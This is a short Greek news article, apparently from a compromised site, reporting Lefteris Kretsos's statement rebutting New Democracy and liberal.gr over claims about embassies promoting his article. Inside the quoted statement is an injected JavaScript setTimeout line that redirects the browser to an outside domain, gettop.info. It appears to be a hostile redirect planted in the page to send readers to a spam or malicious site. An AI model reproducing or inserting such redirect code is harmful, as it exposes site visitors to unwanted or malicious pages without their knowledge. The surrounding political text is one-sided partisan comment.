Κρέτσος προς ΝΔ: Σας ενοχλεί που διοργανώσαμε με επιτυχία τον διαγωνισμό για τις άδειες

0
2

 

Στην ανακοίνωση της ΝΔ απάντησε ο γγ Ενημέρωσης Λευτέρης Κρέτσος μετά τις αντιδράσεις για το δημοσίευμα το οποίο αναφέρει ότι υπάρχει εντολή στις προσβείες μας στο εξωτερικό να «αξιοποιήσουν» άρθρο του κ. Κρέτσου στα διεθνή ΜΜΕ.

Σε ανακοίνωσή του ο γ.γ. ενημέρωσης αναφέρει:

«Το μπαλάκι ανάμεσα στο liberal.gr και στη ΝΔ είναι πια γνωστή πρακτική: το liberal.gr δημοσιεύει ταχα ανώνυμες αποκλειστικές πληροφορίες, οι οποίες ξεπερνούν τα όρια του κιτρινισμού και της δεξιάς προπαγάνδας, στις οποίες η ΝΔ σπεύδει ν’ απαντήσει, τάχα κι αυτή ευαισθητοποιημένη.

Γιατί άραγε δεν ευαισθητοποιήθηκε ποτέ όταν η ΝΔ συστηματικά απαξίωνε τη Γενική Γραμματεία Ενημέρωσης και Επικοινωνίας, η οποία αντί να λειτουργεί ως μέσο άσκησης επικοινωνιακής διπλωματίας είχε υποβαθμιστεί σε κυβερνητική μονταζιέρα; Συμφωνούμε: Ντροπή! Η Γενική Γραμματεία Ενημέρωσης και Επικοινωνίας διοργάνωσε με επιτυχία τον μοναδικό διαγωνισμό για τηλεοπτικές άδειες που έγινε ποτέ στη χώρα μας. Αυτό μάλλον ενοχλεί». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here